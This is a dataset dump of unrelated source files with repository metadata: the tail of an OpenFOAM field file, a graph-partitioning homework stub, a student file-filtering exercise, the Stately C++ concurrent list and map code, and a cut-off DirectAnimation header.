4.64502e-05 0.00645938 4.15886e-05 0.00646755 4.06269e-05 0.00647553 3.96562e-05 3.86765e-05 0.00645585 3.32381e-05 0.00646401 3.24722e-05 0.00647196 3.1699e-05 3.09186e-05 0.00645304 2.49066e-05 0.00646118 2.43347e-05 0.00646912 2.37572e-05 2.31743e-05 0.00645095 1.65913e-05 0.00645908 1.62119e-05 0.00646701 1.58286e-05 1.54414e-05 0.00644957 8.29002e-06 0.00645768 8.10155e-06 0.0064656 7.91077e-06 7.71787e-06 0.00644889 0.00645699 0.0064649 -5.43164e-05 0.0035644 8.265e-05 -2.41308e-05 0.00412924 1.34847e-05 0.0046307 5.60122e-05 0.00508329 0.000101435 0.00548707 0.000147489 0.00584122 0.000192123 0.00614538 0.000233656 0.00640052 0.00027084 0.00660895 0.000302876 0.00677418 0.000329378 0.00690062 0.000350318 0.0069932 0.000365944 0.00705704 0.000376699 0.00709715 0.000383147 0.00711816 0.000385899 0.00712423 0.000385569 0.00711894 0.000382729 0.00710527 0.000377895 0.00708563 0.000371506 0.00706191 0.000363933 0.00703556 0.000355476 0.00700768 0.000346371 0.00697905 0.000336805 0.00695025 0.000326921 0.00692168 0.000316826 0.00689361 0.000306603 0.00686623 0.000296313 0.00683964 0.000286 0.00681393 0.000275698 0.00678913 0.000265434 0.00676527 0.000255224 0.00674235 0.000245082 0.00672038 0.000235018 0.00669935 0.000225039 0.00667924 0.000215149 0.00666004 0.000205351 0.00664174 0.000195645 0.00662433 0.000186032 0.00660779 0.000176512 0.0065921 0.000167081 0.00657725 0.000157739 0.00656322 0.000148481 0.00655001 0.000139305 0.00653759 0.000130208 0.00652597 0.000121184 0.00651512 0.00011223 0.00650503 0.000103342 0.00649571 9.4514e-05 0.00648713 8.57423e-05 0.00647929 7.70215e-05 0.00647219 6.83464e-05 0.00646581 5.97118e-05 0.00646016 5.11123e-05 0.00645522 4.25427e-05 0.006451 3.3998e-05 0.0064475 2.54739e-05 0.00644471 1.69674e-05 0.00644264 8.47638e-06 0.00644127 0.0064406 -8.36793e-05 0.00353789 0.000110191 -4.61809e-05 0.00409174 -5.7674e-06 0.00459029 3.71767e-05 0.00504035 8.16736e-05 0.00544257 0.000126301 0.00579659 0.000169492 0.00610219 0.000209828 0.00636019 0.000246195 0.00657258 0.000277836 0.00674253 0.000304357 0.0068741 0.000325678 0.00697188 0.000341982 0.00704074 0.00035364 0.00708549 0.000361141 0.00711066 0.000365035 0.00712034 0.000365884 0.0071181 0.00036422 0.00710694 0.000360529 0.00708932 0.000355235 0.0070672 0.000348696 0.0070421 0.000341207 0.00701516 0.000333005 0.00698725 0.000324279 0.00695898 0.000315176 0.00693079 0.000305807 0.00690298 0.000296259 0.00687577 0.000286598 0.0068493 0.000276874 0.00682365 0.000267124 0.00679888 0.000257376 0.00677502 0.000247653 0.00675208 0.000237969 0.00673006 0.000228338 0.00670898 0.000218767 0.00668881 0.000209264 0.00666954 0.000199833 0.00665118 0.000190476 0.00663369 0.000181195 0.00661707 0.000171991 0.0066013 0.000162863 0.00658637 0.00015381 0.00657227 0.000144829 0.00655899 0.000135919 0.0065465 0.000127078 0.00653481 0.000118301 0.00652389 0.000109585 0.00651375 0.000100928 0.00650436 9.2324e-05 0.00649573 8.377e-05 0.00648784 7.52613e-05 0.0064807 6.67935e-05 0.00647428 5.83619e-05 0.00646859 4.99618e-05 0.00646362 4.15886e-05 0.00645938 3.32381e-05 0.00645585 2.49066e-05 0.00645304 1.65913e-05 0.00645095 8.29002e-06 0.00644957 0.00644889 -0.000104281 0.00351836 0.000123811 -6.80638e-05 0.00405552 -2.71072e-05 0.00454933 1.59714e-05 0.00499727 5.99586e-05 0.00539859 0.000103692 0.00575285 0.00014592 0.00605997 0.000185457 0.00632065 0.000221318 0.00653672 0.000252799 0.00671105 0.000279502 0.00684739 0.000301312 0.00695007 0.000318355 0.0070237 0.000330938 0.0070729 0.00033949 0.0071021 0.000344508 0.00711532 0.000346505 0.0071161 0.000345982 0.00710746 0.000343399 0.0070919 0.000339163 0.00707144 0.000333624 0.00704764 0.000327073 0.00702172 0.000319748 0.00699458 0.000311839 0.00696689 0.000303497 0.00693913 0.000294837 0.00691164 0.000285951 0.00688466 0.000276909 0.00685834 0.000267763 0.0068328 0.000258556 0.00680809 0.000249319 0.00678425 0.000240077 0.00676132 0.000230847 0.00673929 0.000221644 0.00671818 0.000212479 0.00669797 0.000203361 0.00667866 0.000194295 0.00666024 0.000185286 0.0066427 0.000176337 0.00662602 0.000167449 0.00661019 0.000158622 0.0065952 0.000149858 0.00658104 0.000141155 0.00656769 0.000132512 0.00655514 0.000123927 0.00654339 0.000115398 0.00653242 0.000106922 0.00652222 9.84966e-05 0.00651279 9.01179e-05 0.00650411 8.17828e-05 0.00649618 7.34876e-05 0.00648899 6.52285e-05 0.00648254 5.70013e-05 0.00647681 4.88021e-05 0.00647182 4.06269e-05 0.00646755 3.24722e-05 0.00646401 2.43347e-05 0.00646118 1.62119e-05 0.00645908 8.10155e-06 0.00645768 0.00645699 -0.000119858 0.00350275 0.000135463 -8.72195e-05 0.00402288 -4.75679e-05 0.00450968 -5.08973e-06 0.00495479 3.82768e-05 0.00535522 8.1256e-05 0.00570988 0.000122718 0.0060185 0.000161623 0.00628174 0.000197092 0.00650125 0.000228473 0.00667967 0.000255372 0.00682049 0.000277649 0.00692779 0.000295384 0.00700596 0.000308831 0.00705946 0.000318365 0.00709257 0.000324434 0.00710925 0.000327512 0.00711302 0.000328066 0.00710691 0.000326533 0.00709344 0.000323306 0.00707467 0.000318724 0.00705222 0.000313076 0.00702736 0.000306597 0.00700105 0.000299479 0.006974 0.000291876 0.00694673 0.000283908 0.00691961 0.000275669 0.0068929 0.000267233 0.00686678 0.000258658 0.00684137 0.000249986 0.00681676 0.000241253 0.000232486 0.000223706 0.000214928 0.000206167 0.000197432 0.00018873 0.000180068 0.000171449 0.000162877 0.000154353 0.000145879 0.000137455 0.000129079 0.000120752 0.000112472 0.000104237 9.60442e-05 8.78922e-05 7.97776e-05 7.16976e-05 6.36489e-05 5.5628e-05 4.76315e-05 3.96562e-05 3.1699e-05 2.37572e-05 1.58286e-05 7.91077e-06 -0.000133508 -0.000104177 -6.65738e-05 -2.52695e-05 1.72485e-05 5.94686e-05 0.000100245 0.000138603 0.000173735 0.000205028 0.0002321 0.000254791 0.000273147 0.000287377 0.000297809 0.000304848 0.000308929 0.000310491 0.000309947 0.000307676 0.000304007 0.000299223 0.000293558 0.000287206 0.000280321 0.000273027 0.00026542 0.000257578 0.000249561 0.00100548 7.04286e-05 0.0010112 0.000104467 0.00101124 0.000123774 0.000137195 0.000934588 6.27348e-05 0.000942993 9.60625e-05 0.000947753 0.000119014 0.000870666 5.63691e-05 0.000879141 8.75867e-05 0.000112176 0.000810016 5.07988e-05 0.000818064 7.95387e-05 0.000104421 0.000751263 4.57374e-05 0.000758835 7.19669e-05 0.000694006 4.09223e-05 6.47879e-05 0.0006381 3.62071e-05 3.15375e-05 2.69143e-05 ) ; boundaryField { inlet { type calculated; value nonuniform 0(); } outlet { type calculated; value nonuniform 0(); } cylinder { type calculated; value nonuniform 0(); } top { type symmetryPlane; value uniform 0; } bottom { type symmetryPlane; value uniform 0; } defaultFaces { type empty; value nonuniform 0(); } procBoundary17to16 { type processor; value nonuniform List<scalar> 205 ( 5.06924e-05 4.9942e-05 4.84446e-05 4.62071e-05 4.32394e-05 3.95544e-05 3.51676e-05 3.00963e-05 2.70577e-05 2.49976e-05 1.76721e-05 9.62979e-06 2.35483e-05 -2.30655e-06 -1.30473e-05 -2.45265e-05 3.96876e-06 -4.54548e-05 -6.00976e-05 -2.48663e-05 -8.95813e-05 -0.000107841 -6.98084e-05 -0.000147631 -0.000169996 -0.00013507 -0.000222021 -0.000249014 -0.000225442 -0.000315363 -0.000300167 -0.000393666 -0.000430478 -0.000444802 -0.000527322 -0.000561637 -0.000639951 -0.000699629 -0.000770965 -0.000862891 -0.000926894 -0.000993254 -0.000993254 -0.000862891 -0.000926894 -0.000770965 -0.000699629 -0.000639951 -0.000561637 -0.000527322 -0.000444802 -0.000430478 -0.000393666 -0.000300167 -0.000315363 -0.000225442 -0.000249014 -0.000222021 -0.00013507 -0.000169996 -0.000147631 -6.98084e-05 -0.000107841 -8.95813e-05 -2.48663e-05 -6.00976e-05 -4.54548e-05 3.96874e-06 -2.45265e-05 -1.30473e-05 -2.30655e-06 2.35483e-05 9.6298e-06 1.76721e-05 2.49976e-05 2.70577e-05 3.00963e-05 3.51676e-05 3.95544e-05 4.32394e-05 4.62071e-05 4.84446e-05 4.9942e-05 5.06924e-05 -0.00359273 -0.00415942 -0.00466832 -0.00512582 -0.00553249 -0.00588727 -0.00619002 0.000233656 -0.00644205 -0.00660895 -0.00677418 -0.00690062 -0.0069932 -0.00705704 -0.00709715 -0.00711816 -0.00712423 -0.00711894 -0.00710527 -0.00708563 -0.00706191 -0.00703556 -0.00700768 -0.00697905 -0.00695025 -0.00692168 -0.00689361 -0.00686623 -0.00683964 -0.00681393 -0.00678913 -0.00676527 -0.00674235 -0.00672038 -0.00669935 -0.00667924 -0.00666004 -0.00664174 -0.00662433 -0.00660779 -0.0065921 -0.00657725 -0.00656322 -0.00655001 -0.00653759 -0.00652597 -0.00651512 -0.00650503 -0.00649571 -0.00648713 -0.00647929 -0.00647219 -0.00646581 -0.00646016 -0.00645522 -0.006451 -0.0064475 -0.00644471 -0.00644264 -0.00644127 -0.0064406 -0.00359273 -0.00415942 -0.00466832 -0.00512582 -0.00553249 -0.00588727 -0.00619002 -0.00644205 -0.00664613 -0.00680621 -0.00692712 -0.00701414 -0.00707267 -0.0071079 -0.0071246 -0.00712698 -0.00711861 -0.00710244 -0.0070808 -0.00705552 -0.00702799 -0.00699922 -0.00696994 -0.00694069 -0.0069118 -0.00688352 -0.006856 -0.00682935 -0.00680361 -0.00677883 -0.006755 -0.00673214 -0.00671024 -0.00668928 -0.00666926 -0.00665015 -0.00663195 -0.00661463 -0.00659817 -0.00658258 -0.00656781 -0.00655388 -0.00654075 -0.00652842 -0.00651687 -0.00650609 -0.00649608 -0.00648682 -0.0064783 -0.00647052 -0.00646347 -0.00645713 -0.00645152 -0.00644662 -0.00644243 -0.00643896 -0.00643619 -0.00643413 -0.00643278 -0.00643213 ) ; } procBoundary17to18 { type processor; value nonuniform List<scalar> 201 ( -8.16855e-05 -7.9882e-05 -8.12625e-06 -7.98158e-05 -7.38009e-05 -6.58176e-05 -5.58969e-05 -4.4076e-05 -3.03986e-05 -1.49137e-05 -9.61874e-06 8.37532e-06 2.95119e-05 5.24809e-05 7.72104e-05 3.59133e-05 0.0001214 0.00015265 8.54181e-05 0.000212333 0.000250885 0.000291192 0.000194746 0.000375402 0.000423846 0.000423846 0.000194746 0.000375402 0.000291192 0.000250885 0.000212333 8.54182e-05 0.00015265 0.0001214 3.59133e-05 7.72104e-05 5.24809e-05 2.95119e-05 8.37531e-06 -9.6187e-06 -1.49137e-05 -3.03986e-05 -4.4076e-05 -5.58969e-05 -6.58177e-05 -7.38009e-05 -7.98158e-05 -8.1262e-06 -7.9882e-05 -8.16855e-05 2.23702e-05 0.000478517 0.0005303 0.000583519 5.79119e-05 0.000644976 0.000701185 9.62798e-05 0.000766976 0.000825819 0.00088598 0.000134665 0.000950283 0.0010095 0.00014667 0.00348959 0.00399355 0.00447208 0.00491349 0.0053127 0.00566766 0.00597773 0.00624338 0.00646612 0.00664838 0.00679342 0.0069051 0.00698761 0.00704523 0.00708214 0.00710221 0.00710894 0.00710535 0.00709398 0.00707694 0.00705589 0.00703215 0.00700672 0.00698036 0.00695362 0.0069269 0.00690051 0.00687462 0.00684939 0.0068249 0.00680122 0.00677838 0.00675641 0.00673531 0.00671509 0.00669575 0.00667728 0.00665968 0.00664292 0.00662702 0.00661194 0.0065977 0.00658426 0.00657163 0.00655979 0.00654873 0.00653845 0.00652894 0.00652019 0.00651219 0.00650493 0.00649842 0.00649265 0.00648761 0.0064833 0.00647972 0.00647687 0.00647474 0.00647333 0.00647262 0.00679299 0.00677009 0.00674807 0.00672696 0.00670673 0.0066874 0.00666894 0.00665136 0.00663464 0.00661876 0.00660372 0.00658951 0.00657611 0.00656352 0.00655172 0.0065407 0.00653046 0.00652098 0.00651226 0.00650429 0.00649707 0.00649059 0.00648484 0.00647982 0.00647553 0.00647196 0.00646912 0.00646701 0.0064656 0.0064649 0.00348959 0.00014667 0.00399355 0.00447208 0.00491349 0.0053127 0.00566766 0.00597773 0.00624338 0.00646612 0.00664838 0.00679342 0.0069051 0.00698761 0.00704523 0.00708214 0.00710221 0.00710894 0.00710535 0.00709398 0.00707694 0.00705589 0.00703215 0.00700672 0.00698036 0.00695362 0.0069269 0.00690051 0.00687462 0.00684939 0.000241417 0.0068249 0.0010095 0.000950283 0.000134665 0.00088598 0.000825819 0.000766976 9.62799e-05 0.000701185 0.000644976 5.79119e-05 0.000583519 0.0005303 0.000478517 2.23703e-05 ) ; } } // ************************************************************************* //
96d138a44b8b4302cf6cf54e61a561886cf55ff0
2937bc82baf39013855f17039954bf2f73d6def1
/hw2_pnr/partition/partition.cpp
5322fddebbb06002f8a174b00c8842adaf435312
[]
no_license
magic3007/VLSI-CAD
f6d0a3faa056439869040d30ef022cbb08bf968c
bbc5ee5fdd4c5786f3c5411600853bf6a5349d41
refs/heads/main
2023-06-11T07:26:20.332375
2021-07-02T17:27:55
2021-07-02T17:27:55
348,388,994
3
0
null
null
null
null
UTF-8
C++
false
false
1,061
cpp
partition.cpp
#include "partition.h" #include <iostream> void Partitioner::run() { /* TODO: 2-way FM */ } /* You are not allowed to modify the following function */ void Partitioner::print_result() { for (int i = 0; i < blocks; i++) { printf("Block #%d, Node Num: %d\n", i, blockNodeNum[i]); } Value_Type totalCuts = 0; int netNum = graph.getNetNum(); for (int i = 0; i < netNum; i++) { auto &net = graph.getNet(i); if (net.nodes().size() == 0) continue; Value_Type cuts = -1; vector<bool> vis(blocks, 0); for (auto nodeId : net.nodes()) { auto& node = graph.getNode(nodeId); if (!vis[node.getBlock()]) { cuts++; vis[node.getBlock()] = 1; } } totalCuts += cuts; } printf("total Cuts: %d\n", totalCuts); Value_Type totalPenalty = std::max(blockNodeNum[0] - blockNodeNum[1], blockNodeNum[1] - blockNodeNum[0]) + totalCuts; printf("total Penalty: %d\n", totalPenalty); }
34d50245238c9f2f8283040f4794b30c72fb4234
1304faa02f4f93947067b5609b1b7d3f43dd580e
/assignment.2 -15.cpp
710330896f448e89b7a5d05b7983e383027cb95d
[]
no_license
bhavya2728/bhavya
b0fc86b3c981dfb1687d3250acbc571149dc6a3a
fd60ace974e3d6b42653516ec16804bd40972c95
refs/heads/master
2020-08-04T22:09:41.935966
2019-10-02T08:55:37
2019-10-02T08:55:37
212,294,492
0
0
null
null
null
null
UTF-8
C++
false
false
401
cpp
assignment.2 -15.cpp
#include<iostream> #include<fstream> using namespace std; int main() { ifstream fin; fin.open("FIRST.TXT"); ofstream fout; fout.open("SECOND.TXT"); char word[30]; while(!fin.is_open()) { fin>>word; if(word[0]=='a'||word[0]=='e'||word[0]=='i'||word[0]=='o'||word[0]=='u') fout<<word<<" "; } fin.close(); fout.close(); { cout<<"error"; } return 0; }
08647361ddce6604e63a63b50e8dd73d21ff094f
9dee979b37dee2e6a56fdce849a758992476165b
/cpp/code/src/main/cpp/StatelyCollections.cpp
0610ba5e14d06c358901cf1f5b2624dcfc0339ea
[ "Apache-2.0" ]
permissive
rafaeltoledo/Stately
77b9b2d4f1825aa976148741a2b51df897e63bff
2091d59fc30a10b06b11f9550f18aac4e2df0953
refs/heads/master
2020-08-28T05:46:25.229632
2019-10-25T21:04:48
2019-10-25T21:04:48
217,611,915
0
0
Apache-2.0
2019-10-25T20:43:50
2019-10-25T20:43:50
null
UTF-8
C++
false
false
15,953
cpp
StatelyCollections.cpp
/* * Copyright (C) 2019 Touchlab, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #include <stdlib.h> #include <list> #include <pthread.h> #include "Types.h" #include "Alloc.h" #include "Natives.h" #include "Memory.h" #include "KAssert.h" extern "C" { KInt generalHash(KRef a); KBoolean generalEquals(KRef a, KRef b); OBJ_GETTER(makeByteMemory, KInt size); void cppTrace(KInt traceVal); RUNTIME_NORETURN void Throw_IndexOutOfBoundsException(); RUNTIME_NORETURN void Throw_NoSuchElementException(); } namespace stately { class Locker { public: explicit Locker(pthread_mutex_t *lock) : lock_(lock) { pthread_mutex_lock(lock_); } ~Locker() { pthread_mutex_unlock(lock_); } private: pthread_mutex_t *lock_; }; struct KeyBoxHash { std::size_t operator()(KNativePtr keyVal) const { size_t keyHash = generalHash((KRef) keyVal); return (keyHash); } }; struct KeyBoxEq { bool operator()(KNativePtr a, KNativePtr b) const { return generalEquals((KRef) a, (KRef) b); } }; using StatelyMap = std::unordered_map<void *, void *, stately::KeyBoxHash, stately::KeyBoxEq, KonanAllocator<std::__1::pair<void *const, void *>>>; using StatelyList = std::list<void *, KonanAllocator<void *>>; void *nativeMemToPointer(KRef nativeMemory) { return (void *) ArrayAddressOfElementAt(nativeMemory->array(), 0); } class ListNodeBox { public: ListNodeBox(const StatelyList::iterator &iterator, StatelyList *list) : iterator_(iterator), list_(list) { } void readd() { void **pVoid = &*iterator_; void* entry = *pVoid; list_->erase(iterator_); list_->push_back(entry); auto endIter = list_->end(); endIter--; iterator_ = endIter; } void remove() { void *&entry = *iterator_; list_->erase(iterator_); DisposeStablePointer(entry); } private: StatelyList::iterator iterator_; StatelyList *list_; }; class ListIterBox { public: ListIterBox(const StatelyList::iterator &iterator, StatelyList *list) : iterator_(iterator), list_(list) { } KBoolean hasPrevious() { return !freshIter; } KBoolean hasNext() { const std::list<void *, KonanAllocator<void *>>::iterator &iterEnd = list_->end(); if(list_->size() == 0 || iterator_ == iterEnd) return false; if(freshIter) return true; iterator_++; bool nextEnd = iterator_ == iterEnd; iterator_--; return !nextEnd; } OBJ_GETTER0(next) { const std::list<void *, KonanAllocator<void *>>::iterator &iterEnd = list_->end(); if(iterator_ == iterEnd) Throw_NoSuchElementException(); if(freshIter) freshIter = false; else iterator_++; if(iterator_ == iterEnd) Throw_NoSuchElementException(); auto retval = *iterator_; RETURN_OBJ((KRef) retval); } OBJ_GETTER0(previous) { _rewind(); auto retval = *iterator_; RETURN_OBJ((KRef) retval); } void _rewind(){ if(freshIter) { Throw_NoSuchElementException(); } if(iterator_ == list_->begin()) freshIter = true; else iterator_--; } void add(KRef value) { if(freshIter) { Throw_NoSuchElementException(); } RuntimeAssert(PermanentOrFrozen(value), "Must be frozen - iter add"); iterator_ = list_->insert(iterator_, CreateStablePointer(value)); } void remove() { if(freshIter) { Throw_NoSuchElementException(); } void **pVoid = &*iterator_; void * entry = *pVoid; DisposeStablePointer(entry); iterator_ = list_->erase(iterator_); _rewind(); } void set(KRef value) { void **pVoid = &*iterator_; DisposeStablePointer(*pVoid); RuntimeAssert(PermanentOrFrozen(value), "Must be frozen - iter set"); *iterator_ = CreateStablePointer(value); } private: StatelyList::iterator iterator_; StatelyList *list_; bool freshIter = true; }; class FastList { public: FastList() { pthread_mutexattr_init(&attr_); pthread_mutexattr_settype(&attr_, PTHREAD_MUTEX_RECURSIVE); pthread_mutex_init(&lock_, &attr_); } ~FastList() { pthread_mutex_destroy(&lock_); } KInt size() { Locker locker(&lock_); return list_.size(); } void add(KRef value) { Locker locker(&lock_); RuntimeAssert(PermanentOrFrozen(value), "Must be frozen - list add"); list_.push_back(CreateStablePointer(value)); } void clear() { Locker locker(&lock_); auto it = list_.begin(); while (it != list_.end()){ DisposeStablePointer(*it); it++; } list_.clear(); } OBJ_GETTER0(beginIter) { Locker locker(&lock_); auto it = list_.begin(); KRef nativeMemory = makeByteMemory(sizeof(ListIterBox), OBJ_RESULT); auto iterBox = new(nativeMemToPointer(nativeMemory)) ListIterBox(list_.begin(), &list_); RETURN_OBJ(nativeMemory); } OBJ_GETTER(addNode, KRef value) { Locker locker(&lock_); RuntimeAssert(PermanentOrFrozen(value), "Must be frozen - list addNode"); list_.push_back(CreateStablePointer(value)); KRef nativeMemory = makeByteMemory(sizeof(ListNodeBox), OBJ_RESULT); auto endIter = list_.end(); endIter--; auto iterBox = new(nativeMemToPointer(nativeMemory)) ListNodeBox(endIter, &list_); RETURN_OBJ(nativeMemory); } void lock(){ pthread_mutex_lock(&lock_); } void unlock(){ pthread_mutex_unlock(&lock_); } pthread_mutex_t lock_; private: StatelyList list_; pthread_mutexattr_t attr_; }; extern "C" { KLong Stately_list_create() { FastList *map = konanConstructInstance<FastList>(); return (KLong) map; } KInt Stately_lest_size(KLong ptr) { return ((FastList *) ptr)->size(); } void Stately_list_add(KLong ptr, KRef value) { ((FastList *) ptr)->add(value); } OBJ_GETTER(Stately_list_addNode, KLong ptr, KRef value) { FastList *pList = (FastList *) ptr; RETURN_RESULT_OF(pList->addNode, value); } ListNodeBox * castNode(KRef nativeMemory){ return (ListNodeBox *) nativeMemToPointer(nativeMemory); } void Stately_list_nodeRemove(KLong ptr, KRef nativeMemory) { Locker locker(&(((FastList *) ptr)->lock_)); ListNodeBox *pBox = castNode(nativeMemory); pBox->remove(); } void Stately_list_nodeReadd(KLong ptr, KRef nativeMemory) { Locker locker(&(((FastList *) ptr)->lock_)); ListNodeBox *pBox = castNode(nativeMemory); pBox->readd(); } void Stately_list_clear(KLong ptr) { Locker locker(&(((FastList *) ptr)->lock_)); ((FastList *) ptr)->clear(); } OBJ_GETTER(Stately_list_beginIter, KLong ptr) { FastList *pList = (FastList *) ptr; RETURN_RESULT_OF0(pList->beginIter); } ListIterBox * castIter(KRef nativeMemory){ return (ListIterBox *) nativeMemToPointer(nativeMemory); } KBoolean Stately_list_iterHasPrevious(KLong ptr, KRef nativeMemory) { Locker locker(&(((FastList *) ptr)->lock_)); ListIterBox *pBox = castIter(nativeMemory); return pBox->hasPrevious(); } KBoolean Stately_list_iterHasNext(KLong ptr, KRef nativeMemory) { Locker locker(&(((FastList *) ptr)->lock_)); ListIterBox *pBox = castIter(nativeMemory); return pBox->hasNext(); } OBJ_GETTER(Stately_list_iterNext, KLong ptr, KRef nativeMemory) { Locker locker(&(((FastList *) ptr)->lock_)); ListIterBox *pBox = castIter(nativeMemory); RETURN_RESULT_OF0(pBox->next); } OBJ_GETTER(Stately_list_iterPrevious, KLong ptr, KRef nativeMemory) { Locker locker(&(((FastList *) ptr)->lock_)); ListIterBox *pBox = castIter(nativeMemory); RETURN_RESULT_OF0(pBox->previous); } void Stately_list_iterAdd(KLong ptr, KRef nativeMemory, KRef value) { Locker locker(&(((FastList *) ptr)->lock_)); ListIterBox *pBox = (ListIterBox *) nativeMemToPointer(nativeMemory); pBox->add(value); } void Stately_list_iterRemove(KLong ptr, KRef nativeMemory) { Locker locker(&(((FastList *) ptr)->lock_)); ListIterBox *pBox = castIter(nativeMemory); pBox->remove(); } void Stately_list_iterSet(KLong ptr, KRef nativeMemory, KRef value) { Locker locker(&(((FastList *) ptr)->lock_)); ListIterBox *pBox = castIter(nativeMemory); pBox->set(value); } void Stately_list_lock(KLong ptr) { ((FastList *) ptr)->lock(); } void Stately_list_unlock(KLong ptr) { ((FastList *) ptr)->unlock(); } } class IterBox { public: IterBox(const StatelyMap::iterator &iterator, StatelyMap *map) : iterator_(iterator), map_(map) { } StatelyMap::iterator iterator_; StatelyMap *map_; }; class FastHashMap { public: FastHashMap() { pthread_mutexattr_init(&attr_); pthread_mutexattr_settype(&attr_, PTHREAD_MUTEX_RECURSIVE); pthread_mutex_init(&lock_, &attr_); } ~FastHashMap() { pthread_mutex_destroy(&lock_); } KInt size() { Locker locker(&lock_); return map_.size(); } void clear() { Locker locker(&lock_); auto it = map_.begin(); while (it != map_.end()) { DisposeStablePointer(it->first); DisposeStablePointer(it->second); it++; } map_.clear(); } KBoolean contains(KRef key) { Locker locker(&lock_); return map_.find((KNativePtr) key) != map_.end(); } KBoolean containsValue(KRef value) { Locker locker(&lock_); auto it = map_.begin(); while (it != map_.end()) { if (generalEquals(value, (KRef) it->second)) return true; it++; } return false; } OBJ_GETTER(put, KRef key, KRef value) { Locker locker(&lock_); auto it = map_.find(key); KNativePtr currentValue = nullptr; if (it != map_.end()) { currentValue = it->second; DisposeStablePointer(it->first); map_.erase(it); } RuntimeAssert(PermanentOrFrozen(key), "Must be frozen - map put key"); RuntimeAssert(PermanentOrFrozen(value), "Must be frozen - map put value"); auto keyPtr = CreateStablePointer(key); auto valuePtr = CreateStablePointer(value); map_[keyPtr] = valuePtr; if(currentValue != nullptr) { auto result = AdoptStablePointer(currentValue, OBJ_RESULT); return result; } else{ RETURN_OBJ(nullptr); } } OBJ_GETTER(remove, KRef key) { Locker locker(&lock_); auto it = map_.find(key); KNativePtr currentValue = nullptr; if (it != map_.end()) { currentValue = it->second; DisposeStablePointer(it->first); map_.erase(it); } if(currentValue != nullptr) { auto result = AdoptStablePointer(currentValue, OBJ_RESULT); return result; } else{ RETURN_OBJ(nullptr); } } OBJ_GETTER(get, KRef key) { Locker locker(&lock_); auto it = map_.find(key); KNativePtr currentValue = nullptr; if (it == map_.end()) { RETURN_OBJ(nullptr); } else { RETURN_OBJ((KRef)it->second); } } KRef beginIter() { Locker locker(&lock_); auto it = map_.begin(); ObjHolder kotlinValueHolder; KRef nativeMemory = makeByteMemory(sizeof(IterBox), kotlinValueHolder.slot()); auto iterBox = new(nativeMemToPointer(nativeMemory)) IterBox(map_.begin(), &map_); return nativeMemory; } private: StatelyMap map_; pthread_mutexattr_t attr_; pthread_mutex_t lock_; }; extern "C" { KLong Stately_map_create() { FastHashMap *map = konanConstructInstance<FastHashMap>(); return (KLong) map; } void Stately_map_clear(KLong mapPtr) { ((FastHashMap *) mapPtr)->clear(); } void Stately_map_destroy(KLong mapPtr) { ((FastHashMap *) mapPtr)->clear(); konanDestructInstance((FastHashMap *) mapPtr); } KInt Stately_map_size(KLong mapPtr) { return ((FastHashMap *) mapPtr)->size(); } KBoolean Stately_map_contains(KLong mapPtr, KRef key) { return ((FastHashMap *) mapPtr)->contains(key); } KBoolean Stately_map_containsValue(KLong mapPtr, KRef value) { return ((FastHashMap *) mapPtr)->containsValue(value); } OBJ_GETTER(Stately_map_put, KLong mapPtr, KRef key, KRef value) { return ((FastHashMap *) mapPtr)->put(key, value, OBJ_RESULT); } OBJ_GETTER(Stately_map_remove, KLong mapPtr, KRef key) { return ((FastHashMap *) mapPtr)->remove(key, OBJ_RESULT); } OBJ_GETTER(Stately_map_get, KLong mapPtr, KRef key) { RETURN_OBJ(((FastHashMap *) mapPtr)->get(key, OBJ_RESULT)); } OBJ_GETTER(Stately_map_beginIter, KLong mapPtr) { RETURN_OBJ(((FastHashMap *) mapPtr)->beginIter()); } KBoolean Stately_map_iterHasNext(KRef nativeMemory) { IterBox *pBox = (IterBox *) nativeMemToPointer(nativeMemory); return pBox->iterator_ != pBox->map_->end(); } OBJ_GETTER(Stately_map_iterNextKey, KRef nativeMemory) { IterBox *pBox = (IterBox *) nativeMemToPointer(nativeMemory); auto retval = pBox->iterator_->first; pBox->iterator_++; RETURN_OBJ((KRef) retval); } OBJ_GETTER(Stately_map_iterNextValue, KRef nativeMemory) { IterBox *pBox = (IterBox *) nativeMemToPointer(nativeMemory); auto retval = pBox->iterator_->second; pBox->iterator_++; RETURN_OBJ((KRef) retval); } void Stately_map_iterRemove(KRef nativeMemory) { IterBox *pBox = (IterBox *) nativeMemToPointer(nativeMemory); pBox->iterator_ = pBox->map_->erase(pBox->iterator_); } /** * Get size of this object. Used to init byte array. * @return */ KInt Stately_map_iterBoxSize() { return sizeof(IterBox); } KInt Stately_debug_refCount(KRef a){ return a->container()->refCount(); } } } // namespace stately
eee0b802d8e1d8e7e905b86bab318e7a40a0b4a7
6b40e9dccf2edc767c44df3acd9b626fcd586b4d
/NT/multimedia/danim/src/appel/privinc/rmvisgeo.h
6799d6913587923339b32d313eaacd69192aa046
[]
no_license
jjzhang166/WinNT5_src_20201004
712894fcf94fb82c49e5cd09d719da00740e0436
b2db264153b80fbb91ef5fc9f57b387e223dbfc2
refs/heads/Win2K3
2023-08-12T01:31:59.670176
2021-10-14T15:14:37
2021-10-14T15:14:37
586,134,273
1
0
null
2023-01-07T03:47:45
2023-01-07T03:47:44
null
UTF-8
C++
false
false
11,732
h
rmvisgeo.h
#pragma once #ifndef _RMVISGEO_H #define _RMVISGEO_H /******************************************************************************* Copyright (c) 1996-1998 Microsoft Corporation. All rights reserved. Building a geometry out of a D3D retained mode visual. *******************************************************************************/ #include <dxtrans.h> #include <d3drmvis.h> #include "privinc/bbox3i.h" #include "privinc/probe.h" #include "privinc/colori.h" #include "privinc/matutil.h" #include "privinc/d3dutil.h" #include "privinc/ddrender.h" #include "privinc/importgeo.h" // Class Declarations class GeomRenderer; class Transform2; class AttrState { public: Color emissive; Color diffuse; Color specular; Real specularExp; Real opacity; IDirect3DRMTexture *texture; bool shadowMode; }; /***************************************************************************** The MeshInfo class contains information about a given mesh, including the group and vertex information. Note that this class does not AddRef() the given mesh -- it is the responsibility of the caller to handle that. *****************************************************************************/ class MeshInfo : public AxAValueObj { public: MeshInfo(); ~MeshInfo (void) { CleanUp(); } void CleanUp (void); void SetMesh (IDirect3DRMMesh* mesh); bool IsEmpty (void) const; void SetMaterialProperties ( Color *emissive, Color *diffuse, Color *specular, Real specularExp, Real opacity, IDirect3DRMTexture *texture, bool shadowmode, int renderDevID); 